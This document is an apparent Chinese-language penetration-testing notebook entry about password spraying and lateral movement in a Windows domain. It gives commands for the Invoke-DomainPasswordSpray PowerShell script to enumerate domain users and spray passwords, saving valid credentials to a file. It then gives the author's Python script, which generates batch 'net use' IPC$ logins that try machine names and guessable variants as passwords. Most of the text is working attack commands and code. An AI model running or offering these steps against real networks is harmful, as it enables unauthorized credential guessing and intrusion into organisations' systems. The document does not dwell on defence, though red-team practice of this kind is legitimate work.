前言:根據用戶名密碼規則來進行模糊測試
Invoke-DomainPasswordSpray.ps1腳本地址:http://payloads.online/scripts/Invoke-DomainPasswordSpray.txt
自動生成來自當前用戶域的用戶列表,並嘗試使用每個用戶名和Winter2016
密碼進行身份驗證。
powershell Invoke-DomainPasswordSpray.ps1 -Password Winter2016
從域中收集用戶列表存儲到user.txt中
Import-Module .\Invoke-DomainPasswordSpray.ps1
Get-DomainUserList -Domain pentest.God -RemoveDisabled -RemovePotentialLockouts | Out-File -Encoding ascii user.txt
從users.txt中提取用戶名,與pass.txt中的密碼對照成一對口令,進行域認證枚舉,登錄成功的結果將會輸出到sprayed-creds.txt
powershell .\Invoke-DomainPasswordSpray.ps1 -UserList user.txt -Domain pentest.God -PasswordList pass.txt -OutFile sprayed-creds.txt
之前看到冰冰的操作:洗數據,自己也嘗試的寫了一個方便來橫向,自己的思路就簡單點就直接機器名和密碼相同進行傳遞,然后還可以進行改改,上面的ps腳本是來進行域中用戶來進行攻擊的,自己就嘗試本地組來進行測試,雖然有點雞肋,確實雞肋,就當作自己練習了下吧,以后有好的想法再改!
# coding=utf-8
# 拆分域機器名,拼湊ipc格式,進行批量ipc
import re
import sys
content_regexp = "\s+" # 多個空格進行字符串拆分到數組
LocalNetUseFormat = "net use \\\\{0} /u:a\\{1} {2}"
DomainNetUseFormat = "net use \\\\{0} /u:{1}\\{2} {3}"
# 首先把net group "Domain Computers" /domain得到的域機器名字放在文本中
with open("C:\\Users\\dell\\Desktop\\自己練手腳本\\IPC$橫向批處理\\computer.txt", 'r') as f:
content = f.read()
# print(content_line)
computer_content_array = re.split(content_regexp, content)
# with open("domain_computer_username.txt", 'w') as b: # 只能寫,如果文件不存在則創建
for computer in computer_content_array:
# b.write(computer[:-1] + "\n")
print(LocalNetUseFormat.format(
computer[:-1], computer[:-1], computer[:-1])) # 賬號為機器名 密碼為機器名
#print(LocalNetUseFormat.format(computer[:-1], computer[:-1], computer[:-1] + "pass@123"))
#print(LocalNetUseFormat.format(computer[:-1], computer[:-1], computer[:-1] + "p@ssw0rd"))
#print(LocalNetUseFormat.format(computer[:-1], computer[:-1], computer[:-1] + computer[:-1] + "123"))
# print("處理成功,保存在當前目錄下的domain_computer_username.txt文件中....")